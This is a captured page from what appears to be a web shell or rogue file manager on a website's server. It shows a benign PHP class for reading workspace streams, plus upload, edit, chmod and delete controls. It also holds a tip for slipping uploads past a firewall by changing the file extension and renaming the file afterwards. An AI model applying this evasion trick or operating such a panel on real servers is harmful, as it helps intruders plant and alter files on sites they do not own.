Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
podiocopy.bitkit.dk
httpdocs
app
Modules
WorkSpace
File Content:
WorkSpaceStreamModel.php
<?php namespace App\Modules\WorkSpace; use App\Modules\GenModels\JModel; /** * Created by PhpStorm. * User: jis * Date: 19/5/15 * Time: 11:35 AM */ class WorkSpaceStreamModel extends JModel { protected $table = 'podio_workspace_stream'; public function __construct() { parent::__construct(array("table" => $this->table)); } public function getStreams($query) { $cursor = $this->collection->find($query); if ($cursor) { $cursor = $this->collection->find( $query, [ 'sort' => array('updatedTime' => -1) ] ); // if ($cursor->count() > 0) { return $cursor; // } } return null; } }
Edit
Download
Unzip
Chmod
Delete